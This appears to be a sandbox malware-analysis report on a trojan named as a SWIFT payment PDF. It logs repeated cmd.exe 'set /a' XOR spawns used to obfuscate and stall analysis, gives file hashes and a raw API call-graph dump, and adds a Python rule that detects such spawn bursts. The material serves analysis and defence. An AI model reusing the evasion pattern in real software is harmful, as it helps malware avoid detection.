                                    Start time:13:38:28
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:92
                                    Start time:13:38:28
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "145^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:93
                                    Start time:13:38:28
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:94
                                    Start time:13:38:28
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "216^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:95
                                    Start time:13:38:28
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:96
                                    Start time:13:38:28
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "145^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:97
                                    Start time:13:38:28
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:98
                                    Start time:13:38:28
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "129^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:99
                                    Start time:13:38:28
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:100
                                    Start time:13:38:28
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "157^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:101
                                    Start time:13:38:28
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:102
                                    Start time:13:38:28
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "145^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:103
                                    Start time:13:38:28
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:104
                                    Start time:13:38:28
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "193^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:105
                                    Start time:13:38:29
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:106
                                    Start time:13:38:29
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "145^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:107
                                    Start time:13:38:29
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:108
                                    Start time:13:38:29
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "129^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:109
                                    Start time:13:38:29
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:110
                                    Start time:13:38:29
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "157^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:111
                                    Start time:13:38:29
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:112
                                    Start time:13:38:29
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "145^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:113
                                    Start time:13:38:29
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:114
                                    Start time:13:38:29
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "216^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:115
                                    Start time:13:38:29
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:116
                                    Start time:13:38:29
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "145^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:117
                                    Start time:13:38:29
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:118
                                    Start time:13:38:29
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "133^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:119
                                    Start time:13:38:29
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:120
                                    Start time:13:38:29
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "157^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:121
                                    Start time:13:38:29
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:122
                                    Start time:13:38:30
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "145^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:123
                                    Start time:13:38:30
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:124
                                    Start time:13:38:30
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "216^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:125
                                    Start time:13:38:30
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:126
                                    Start time:13:38:30
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "145^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:127
                                    Start time:13:38:30
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:128
                                    Start time:13:38:30
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "129^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:129
                                    Start time:13:38:30
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:130
                                    Start time:13:38:30
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "201^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:131
                                    Start time:13:38:30
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:132
                                    Start time:13:38:30
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "137^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:133
                                    Start time:13:38:30
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:134
                                    Start time:13:38:30
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "129^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:135
                                    Start time:13:38:30
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:136
                                    Start time:13:39:06
                                    Start date:26/04/2024
                                    Path:C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe"
                                    Imagebase:0x400000
                                    File size:421'592 bytes
                                    MD5 hash:1048340BCFAE30DF032C161AC52F8F0E
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:140
                                    Start time:13:39:21
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1268 -s 1092
                                    Imagebase:0x650000
                                    File size:482'640 bytes
                                    MD5 hash:40A149513D721F096DDF50C04DA2F01F
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true
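
The four cmd.exe entries above (Target IDs 128, 130, 132 and 134, all started at 13:38:30, each paired with a conhost.exe) are what the "Mass process execution to delay analysis" and "Obfuscated command line found" signatures key on: every child evaluates a single XOR (129^177 = 48, 201^177 = 120, 137^177 = 56) and exits, doing no useful work. The detection logic below is an added example in Python, not part of the Joe Sandbox report; the process lines it runs over are constructed to mirror the entries above, and the 5-second window and threshold of 3 are assumed values to tune for your own process-creation telemetry. The XOR results it reports are just the arithmetic; the report does not say what the loader does with them.

```python
import re

# Constructed sample in the report's (start time, path, command line) shape;
# the cmd.exe/conhost pairs mirror Target IDs 127-135 above, the last two
# lines mirror the sample itself and the WerFault crash handler.
SAMPLE_PROCESSES = [
    ("13:38:30", r"C:\Windows\System32\Conhost.exe",
     r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ("13:38:30", r"C:\Windows\SysWOW64\cmd.exe", 'cmd.exe /c set /a "129^177"'),
    ("13:38:30", r"C:\Windows\System32\Conhost.exe",
     r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ("13:38:30", r"C:\Windows\SysWOW64\cmd.exe", 'cmd.exe /c set /a "201^177"'),
    ("13:38:30", r"C:\Windows\System32\Conhost.exe",
     r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ("13:38:30", r"C:\Windows\SysWOW64\cmd.exe", 'cmd.exe /c set /a "137^177"'),
    ("13:38:30", r"C:\Windows\System32\Conhost.exe",
     r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ("13:38:30", r"C:\Windows\SysWOW64\cmd.exe", 'cmd.exe /c set /a "129^177"'),
    ("13:39:06", r"C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe",
     r'"C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe"'),
    ("13:39:21", r"C:\Windows\SysWOW64\WerFault.exe",
     r"C:\Windows\SysWOW64\WerFault.exe -u -p 1268 -s 1092"),
]

# A command line that is a bare `cmd /c set /a "<int>^<int>"` and nothing
# else: no redirection, no chained command, no real work.
SET_A_XOR = re.compile(
    r'^cmd(?:\.exe)?\s+/c\s+set\s+/a\s+"?\s*(\d+)\s*\^\s*(\d+)\s*"?\s*$',
    re.IGNORECASE,
)


def parse_set_a(cmdline):
    """Return (a, b, a ^ b) for an arithmetic-only cmd.exe spawn, else None."""
    m = SET_A_XOR.match(cmdline.strip())
    if not m:
        return None
    a, b = int(m.group(1)), int(m.group(2))
    return a, b, a ^ b


def _seconds(hhmmss):
    """Report start times are HH:MM:SS; convert to seconds since midnight."""
    h, m, s = (int(x) for x in hhmmss.split(":"))
    return h * 3600 + m * 60 + s


def find_set_a_bursts(processes, window_seconds=5, threshold=3):
    """Sliding window over arithmetic-only cmd.exe spawns.

    Returns one dict per burst of at least `threshold` such spawns whose
    start times fall within `window_seconds` of the first one. Both
    defaults are assumed tuning values, not figures from the report.
    """
    # Stable sort by time only, so entries at the same second keep the
    # order in which the sandbox listed them.
    hits = sorted(
        ((_seconds(start), cmd) for start, _path, cmd in processes
         if parse_set_a(cmd) is not None),
        key=lambda h: h[0],
    )
    bursts = []
    i = 0
    while i < len(hits):
        j = i
        while j + 1 < len(hits) and hits[j + 1][0] - hits[i][0] <= window_seconds:
            j += 1
        if j - i + 1 >= threshold:
            bursts.append({
                "first_start": hits[i][0],
                "count": j - i + 1,
                "results": [parse_set_a(c)[2] for _, c in hits[i:j + 1]],
            })
            i = j + 1
        else:
            i += 1
    return bursts


if __name__ == "__main__":
    for b in find_set_a_bursts(SAMPLE_PROCESSES):
        print(f"burst of {b['count']} cmd.exe 'set /a' spawns starting at "
              f"{b['first_start']}s: XOR results {b['results']}")
```

On the constructed sample this reports one burst of four spawns at 13:38:30. In production telemetry (Sysmon event 1, EDR process-create events) the same rule should also key on the parent image, since here every cmd.exe is a child of the unsigned sample rather than of an interactive shell.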


                                      Execution Graph

                                      Execution Coverage:22%
                                      Dynamic/Decrypted Code Coverage:15.3%
                                      Signature Coverage:19.4%
                                      Total number of Nodes:1493
                                      Total number of Limit Nodes:50
                                      [Execution graph: interactive call-graph widget; its serialised edge list (one node per function address, edges caller->callee, node labels naming the Win32 APIs each function calls) is not reproduced here. Node addresses fall in the 0x401000 range of the main image (imagebase 0x400000) and in a second range starting at 0x10001000. API labels that appear in the graph include GlobalAlloc/GlobalFree, VirtualAlloc, LoadLibraryA/GetProcAddress, GetModuleHandleA, CreateProcessA, ShellExecuteA, RegOpenKeyExA/RegQueryValueExA, FindFirstFileA/FindNextFileA, ReadFile/WriteFile/SetFilePointer, SetEnvironmentVariableA, DeleteFileA/CopyFileA/MoveFileA, OpenClipboard/SetClipboardData, ExitWindowsEx, ExitProcess, MessageBoxIndirectA, SHBrowseForFolderA, DialogBoxParamA and SetTimer.]
4439->4440 4440->4433 4440->4434 4440->4435 4442 4058c6 4441->4442 4443 4058ec GetShortPathNameA 4441->4443 4465 405825 GetFileAttributesA CreateFileA 4442->4465 4445 405901 4443->4445 4446 405a25 4443->4446 4445->4446 4448 405909 wsprintfA 4445->4448 4446->4303 4447 4058d0 CloseHandle GetShortPathNameA 4447->4446 4449 4058e4 4447->4449 4450 405b99 18 API calls 4448->4450 4449->4443 4449->4446 4451 405931 4450->4451 4466 405825 GetFileAttributesA CreateFileA 4451->4466 4453 40593e 4453->4446 4454 40594d GetFileSize GlobalAlloc 4453->4454 4455 405a1e CloseHandle 4454->4455 4456 40596f ReadFile 4454->4456 4455->4446 4456->4455 4457 405987 4456->4457 4457->4455 4467 40578a lstrlenA 4457->4467 4460 4059a0 lstrcpyA 4463 4059c2 4460->4463 4461 4059b4 4462 40578a 4 API calls 4461->4462 4462->4463 4464 4059f9 SetFilePointer WriteFile GlobalFree 4463->4464 4464->4455 4465->4447 4466->4453 4468 4057cb lstrlenA 4467->4468 4469 4057d3 4468->4469 4470 4057a4 lstrcmpiA 4468->4470 4469->4460 4469->4461 4470->4469 4471 4057c2 CharNextA 4470->4471 4471->4468 4989 4014f0 SetForegroundWindow 4990 40289c 4989->4990 4991 401af0 4992 402a07 18 API calls 4991->4992 4993 401af7 4992->4993 4994 4029ea 18 API calls 4993->4994 4995 401b00 wsprintfA 4994->4995 4996 40289c 4995->4996 4997 4019f1 4998 402a07 18 API calls 4997->4998 4999 4019fa ExpandEnvironmentStringsA 4998->4999 5000 401a21 4999->5000 5001 401a0e 4999->5001 5001->5000 5002 401a13 lstrcmpA 5001->5002 5002->5000 5003 402877 SendMessageA 5004 402891 InvalidateRect 5003->5004 5005 40289c 5003->5005 5004->5005 5006 10001637 5007 10001666 5006->5007 5008 10001a86 19 API calls 5007->5008 5009 1000166d 5008->5009 5010 10001680 5009->5010 5011 10001674 5009->5011 5013 100016a7 5010->5013 5014 1000168a 5010->5014 5012 10001278 2 API calls 5011->5012 5018 1000167e 5012->5018 5016 100016d1 5013->5016 5017 100016ad 5013->5017 5015 100014ff 3 API calls 5014->5015 5019 1000168f 5015->5019 5021 100014ff 3 API calls 5016->5021 5020 10001576 3 
API calls 5017->5020 5022 10001576 3 API calls 5019->5022 5023 100016b2 5020->5023 5021->5018 5024 10001695 5022->5024 5025 10001278 2 API calls 5023->5025 5026 10001278 2 API calls 5024->5026 5027 100016b8 GlobalFree 5025->5027 5028 1000169b GlobalFree 5026->5028 5027->5018 5029 100016cc GlobalFree 5027->5029 5028->5018 5029->5018 5030 401c78 5031 4029ea 18 API calls 5030->5031 5032 401c7e IsWindow 5031->5032 5033 4019e1 5032->5033 4690 40227d 4691 402a07 18 API calls 4690->4691 4692 40228e 4691->4692 4693 402a07 18 API calls 4692->4693 4694 402297 4693->4694 4695 402a07 18 API calls 4694->4695 4696 4022a1 GetPrivateProfileStringA 4695->4696 5034 1000103d 5035 1000101b 8 API calls 5034->5035 5036 10001056 5035->5036 5037 40427e 5038 4042b4 5037->5038 5039 40428e 5037->5039 5040 403eee 8 API calls 5038->5040 5041 403e87 19 API calls 5039->5041 5042 4042c0 5040->5042 5043 40429b SetDlgItemTextA 5041->5043 5043->5038 5044 4014fe 5045 401506 5044->5045 5047 401519 5044->5047 5046 4029ea 18 API calls 5045->5046 5046->5047 5048 401000 5049 401037 BeginPaint GetClientRect 5048->5049 5050 40100c DefWindowProcA 5048->5050 5052 4010f3 5049->5052 5053 401179 5050->5053 5054 401073 CreateBrushIndirect FillRect DeleteObject 5052->5054 5055 4010fc 5052->5055 5054->5052 5056 401102 CreateFontIndirectA 5055->5056 5057 401167 EndPaint 5055->5057 5056->5057 5058 401112 6 API calls 5056->5058 5057->5053 5058->5057 5059 404801 GetDlgItem GetDlgItem 5060 404853 7 API calls 5059->5060 5068 404a6b 5059->5068 5061 4048f6 DeleteObject 5060->5061 5062 4048e9 SendMessageA 5060->5062 5063 4048ff 5061->5063 5062->5061 5065 404936 5063->5065 5067 405b99 18 API calls 5063->5067 5064 